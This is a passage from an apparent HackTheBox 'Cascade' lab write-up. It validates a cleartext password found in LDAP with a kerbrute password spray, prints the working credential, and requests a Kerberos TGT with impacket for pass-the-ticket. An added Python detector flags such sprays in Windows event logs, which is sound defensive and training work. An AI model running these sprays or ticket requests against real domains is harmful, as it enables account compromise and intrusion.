Validation


The LDAP service running on port 389 with anonymous access enabled allowed me to enumerate the target domain and build a detailed overview of it. While doing so, I discovered what appears to be a CLEARTEXT password hard-coded into one of the LDAP attributes of the r.thompson user. Here, I will validate the credential against the target KDC and then request a TGT for better OPSEC.

┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ kerbrute passwordspray -d CASCADE.LOCAL --dc casc-dc1.cascade.local users 'rY4n5eva'    
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
version: v1.0.3 (9dad6e1) - 06/26/23 - Ronnie Flathers @ropnop
 
2023/06/26 05:40:25 >  Using KDC(s):
2023/06/26 05:40:25 >  	casc-dc1.cascade.local:88
 
2023/06/26 05:40:35 >  [+] VALID LOGIN:	 r.thompson@CASCADE.LOCAL:rY4n5eva
2023/06/26 05:40:45 >  Done! Tested 17 logins (1 successes) in 20.781 seconds

Kerbrute reports a valid login, so the password indeed belongs to the r.thompson user.
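From the blue-team side, a spray like the one above is noisy: every wrong guess produces a Kerberos pre-authentication failure (Event ID 4771, failure code 0x18) from the same client address, and the one pair that works produces a 4768. The following is an added example, not part of the original writeup, that flags this pattern over constructed Security log records; the field names (`time`, `id`, `user`, `ip`, `status`) are an assumption about what a log forwarder would extract, and the threshold values are illustrative.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not real logs). Field names are an assumption
# about what a log forwarder extracts from Event ID 4771 (Kerberos
# pre-authentication failed) and 4768 (TGT requested). Failure code 0x18 is
# KDC_ERR_PREAUTH_FAILED: wrong password for an account that exists.
SAMPLE_EVENTS = [
    # one client walks a user list with a single password, 2 s apart
    *[{"time": f"2023-06-26T05:40:{25 + 2 * i:02d}", "id": 4771,
       "user": f"user{i:02d}", "ip": "10.10.14.5", "status": "0x18"}
      for i in range(6)],
    # the spray ends with a TGT issued for the one pair that worked
    {"time": "2023-06-26T05:40:38", "id": 4768, "user": "r.thompson",
     "ip": "10.10.14.5", "status": "0x0"},
    # a single mistyped password from another host is not a spray
    {"time": "2023-06-26T05:41:00", "id": 4771, "user": "user00",
     "ip": "10.20.0.7", "status": "0x18"},
]


def detect_spray(events, window=timedelta(minutes=5), min_users=5):
    """Return {client_ip: finding} for addresses that fail pre-auth against
    at least `min_users` distinct accounts within `window`; each finding also
    lists accounts that obtained a TGT from that address after the spray began."""
    parsed = sorted(({**e, "ts": datetime.fromisoformat(e["time"])} for e in events),
                    key=lambda e: e["ts"])
    failures, successes = defaultdict(list), defaultdict(list)  # ip -> [(ts, user)]
    for e in parsed:
        if e["id"] == 4771 and e["status"] == "0x18":
            failures[e["ip"]].append((e["ts"], e["user"]))
        elif e["id"] == 4768 and e["status"] == "0x0":
            successes[e["ip"]].append((e["ts"], e["user"]))

    findings = {}
    for ip, fails in failures.items():
        # widest set of distinct accounts hit inside any window starting at a failure
        best = max(({u for ts, u in fails if start <= ts <= start + window}
                    for start, _ in fails), key=len)
        if len(best) >= min_users:
            first_failure = fails[0][0]
            findings[ip] = {
                "distinct_users": len(best),
                "success_after": sorted(u for ts, u in successes[ip] if ts >= first_failure),
            }
    return findings
```

Running `detect_spray(SAMPLE_EVENTS)` flags only 10.10.14.5 (six accounts, then a TGT for r.thompson); the single failure from 10.20.0.7 stays below the threshold.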

TGT


┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ impacket-getTGT CASCADE.LOCAL/r.thompson:rY4n5eva -dc-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Saving ticket in r.thompson.ccache

A TGT was generated for the r.thompson user and saved to r.thompson.ccache. The ticket will allow me to continue the operation with the pass-the-ticket technique.